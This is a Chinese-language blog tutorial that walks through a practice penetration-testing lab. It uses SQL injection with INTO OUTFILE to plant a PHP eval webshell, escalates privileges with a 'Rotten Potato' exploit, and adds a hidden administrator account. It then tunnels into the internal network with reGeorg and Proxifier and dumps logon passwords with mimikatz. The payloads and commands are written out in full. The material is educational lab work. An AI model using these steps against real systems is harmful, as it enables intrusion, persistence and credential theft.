[PHP知识库]sql获得权限，内网穿透获取管理员密码（小宇特详解）

sql获得权限内网穿透获取管理员密码

SQL注入拿webshell（into outfile into dumpfle）

先输入?id=1和?id=2

如果id=1能回显 id=2不能回显，id=2-1能回显，说明有sql注入

sql注入其实可以写webshell的

into outfile 导出文件

into dumpfile 导出文件

将查询的结果导出成文件

http://afsgr16-b1ferw.aqlab.cn/?id=1 union select 1,2 into outfile ‘C:/phpStudy/WWW/123456.txt’

webshell管理工具

菜刀，蚁剑=>一句话木马直接相连（默认流量没有加密）

冰蝎，哥斯拉=>流量有加密，只能上传他自己的木马

这里在sql注入点注入一句话木马

http://afsgr16-b1ferw.aqlab.cn/?id=1 union select 1,"<?php eval($_REQUEST[8])?>" into outfile ‘C:/phpStudy/WWW/4448.php’

提权辅助页面，查询系统可能存在的漏洞

这里将直接用菜刀连接，连接密码为8，连接后打开虚拟终端，这里先看一下权限whoami

当我们遇到不是管理员权限的时候我们肯定需要提权

1.利用目标主机上的服务提权（目标主机运行的xxx软件，但是这个软件有漏洞可以利用）

2.利用web服务（一台机器上可能有多个网站，多个web容器）

3.利用windows漏洞systeminfo找补丁，找没有打的补丁

在虚拟终端中输入systeminfo来查看系统信息

这个是一个windows提权辅助工具https://i.hacking8.com/tiquan/

将systeminfo查到的已打的补丁，查询得到没有打的补丁。然后根据靶机的型号来在github上找到这个cve的漏洞进行操作。

利用魔改版烂土豆提权

这里有一个提权神器。烂土豆。这里可以通过烂土豆来提权

将烂土豆的exe文件，拖入到目录中改名（因为这里的原来的文件名太长了）。在虚拟终端中打开1111.exe(这里改成了1111.exe)。

直接输入1111.exe -p "whoami"来进行提权。

这里已经成了系统权限。

这里通过烂土豆来用系统命令来进行生成一个新的用户

这里可以在网上搜索windows cmd修改管理员权限

net localgroup administrators 用户名 /add

这里1111.exe -p “net localgroup administrators xhy /add”

这里已经提权了

内网传透（通过reg来设置中转站，然后用全局代理远程桌面）

远程桌面只有管理员可以连接

netstat -ano来查看端口

cmd命令mstrc远程桌面连接

你在这里将创建的管理员账号输入，发现登不上。这里是什么原因呢。刚刚咱们找到的那台机器是windows2008，现在是2003这是为什么呢

这就像域名的核心是ip，一个ip底下可能有多台服务器，这些服务器就共用了一个ip，这个的核心是端口映射，这里解释一下什么是端口映射，相当于是有3个主机ABC连在了一个路由器上，这里说网关吧，假如A主机开的3389端口，而B主机不开的3389端口，这样从外网你用3389访问，网关就会让你访问A主机，是永远不可能访问到B主机的。

这里使用了php作为了中间的媒介（PHP可以帮助我们发起请求）

这里使用正向连接：请求=>php=>发送出去 这里的php就相当于一个间谍

将后缀为php的reGeorg这个tunnel.nosocket.php放到菜刀的目录中，也就是网站的目录中。

改个好写的名字访问一下

出现这种样子说明就ok了

在这个目录下cmd一下，这里运行python环境，这里我的是py2，这个只有py2能运行，py3就不行了，这个reGrorg是基于py2的。这里输入python reGeorgSocksProxy.py

然后这里会有一些指令，python reGeorgSocksProxy.py -u http://afsgr16-b1ferw.aqlab.cn/2222.php -p 5242（-u后加那个文件的位置，-p后加端口映射的端口）

等这个运行开以后还得用一个全局流量代理将3389远程桌面连接的请求发到5242端口

全局代理

这里的全局代理用的是Proxifier。

点开配置文件的代理服务器，地址设置为本地127.0.0.1 端口为5242 协议为socks5。然后检查。

接下来这里添加一个规则，名称就写mstsc，应用程序是mstsc.exe，这里的动作用代理也就是proxy SOCKS5 127.0.0.1另一个direct的意思是不拦截。

点击确定。

在菜刀的虚拟终端中，ipconfig一下，发现主机是10.0.1.4

mstsc远程连接一下，这里用自己添加的管理员账户xhy 和 A1B2C3!.Qa登录

登录后用管理员权限打开2.exe

log生成日志

提升权限privilege :: debug

抓取密码sekurlsa :: logonpasswords